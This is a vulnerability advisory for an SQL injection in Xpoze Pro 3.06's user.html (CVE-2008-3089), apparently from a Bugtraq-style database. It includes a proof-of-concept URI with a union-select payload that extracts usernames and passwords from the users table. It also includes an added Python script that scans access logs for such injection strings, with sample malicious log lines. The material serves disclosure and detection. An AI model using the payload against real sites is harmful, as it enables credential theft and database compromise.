Xpoze 'user.html' SQL Injection Vulnerability
Info
| Bugtraq ID: | 30101 |
| Class: | Input Validation Error |
| CVE: | CVE-2008-3089 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 06 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | HIva Team |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Xpoze is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects Xpoze Pro 3.06; other versions may also be vulnerable.
Exploit / POC
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
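Requests of this shape stand out in web server access logs because uid carries something other than a plain integer. The following Python triage script is an added example, not part of the original advisory or of Xpoze; it assumes combined-format access logs and that legitimate uid values are plain decimal integers, and its sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jul/2008:10:00:01 +0000] "GET /user.html?uid=42 HTTP/1.1" 200 5120
203.0.113.9 - - [06/Jul/2008:10:00:07 +0000] "GET /user.html?uid=-1+union+select+1,2,3+FROM+users/* HTTP/1.1" 200 734
198.51.100.4 - - [06/Jul/2008:10:01:00 +0000] "GET /index.html?uid=abc HTTP/1.1" 200 900
198.51.100.7 - - [06/Jul/2008:10:02:00 +0000] "GET /user.html?uid=abc HTTP/1.1" 200 120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def classify_uid(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"[0-9]{1,10}", value):  # allowlist: assumed id format
        return None
    if UNION_RE.search(value):
        return "union-select"
    return "non-numeric"


def uid_verdicts(request_target):
    """Classify every uid parameter in a request target aimed at user.html."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/user.html"):
        return []
    # parse_qs decodes '+' and %XX, so encoded keywords are matched in clear text.
    values = parse_qs(parts.query, keep_blank_values=True).get("uid", [])
    return [(classify_uid(v), v) for v in values if classify_uid(v)]


def scan(log_text):
    """Return (client_ip, verdict, decoded_uid) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            for verdict, value in uid_verdicts(match.group(1)):
                findings.append((line.split()[0], verdict, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The allowlist check on uid is what does the work; the union-select label only helps prioritise hits during review.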
Solution / Fix
Solution:
Vendor updates are available. Please contact the vendor for more information.